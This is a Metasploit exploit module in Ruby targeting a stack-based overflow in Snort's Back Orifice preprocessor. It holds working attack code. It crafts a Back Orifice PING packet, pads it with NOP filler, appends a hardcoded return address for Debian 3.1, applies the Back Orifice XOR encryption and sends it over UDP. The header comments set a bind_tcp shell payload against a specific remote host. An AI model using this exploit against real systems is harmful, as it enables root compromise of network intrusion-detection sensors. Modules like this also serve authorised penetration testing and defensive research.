metasploit-framework/modules/exploits/linux/ids/snortbopre.rb

#use exploit/linux/ids/snortbopre
#set PAYLOAD linux/x86/shell/bind_tcp
#set RHOST 10.10.10.196
#exploit

require 'msf/core'

module Msf

class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote

	include Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
                        'Name'           => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
                        'Description'    => %q{
                                Snort versions since 2.4.0 contain a remotely exploitable vulnerability when 
                                processing Back Orifice (BO) backdoor packets. When determining the 
                                direction (to or from server) of a BO packet, a stack-based overflow can 
                                be triggered by an attacker. This vulnerability could be used to completely 
                                compromise a Snort sensor, and would typically gain an attacker full root 
                                or administrative privileges.
                        },
                        'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
                        'Version'        => '$Revision$',
                        'References'     =>
                                        [
                                                ['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
                                        ],
                        'Payload'        =>
                                {
                                        'Space'    => 1073, #ret : 1069 
                                        'BadChars' => "\x00",
                                },
                        'Targets'        =>
                                [
                                        # Target 0: Debian 3.1 Sarge
                                        [
                                                'Debian 3.1 Sarge',
                                                {
                                                        'Platform' => 'linux',
                                                        'Ret'      => 0xbffff350
                                                }
                                        ],
                                ],
                        'DefaultTarget' => 0))
	

                # Configure the default port to be 9080
                register_options(
                        [
                                Opt::RPORT(9080),
                        ], self.class)

	end

        def msrand(seed)
                @holdrand = 31337
                end

        def mrand()
                return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
                end

        def bocrypt(takepayload)

                @arrpayload = (takepayload.split(//))

                encpayload = ""
                @holdrand=0
                msrand(0)

                @arrpayload.each do |c|
                        encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
                        end

                return encpayload
                end


        def exploit
                connect_udp
                boheader =      "*!*QWTY?"  +
                                [1096].pack("V")  +           # Length ,thanx Russell Sanford
                                "\xed\xac\xef\x0d"+           # ID
                                "\x01"                        # PING
                filler =        make_nops(1069 -(boheader.length + payload.encode.length))

                udp_sock.write(bocrypt(boheader+payload.encode+filler+[target.ret].pack('V')))
				handler
				disconnect_udp
        end

end

end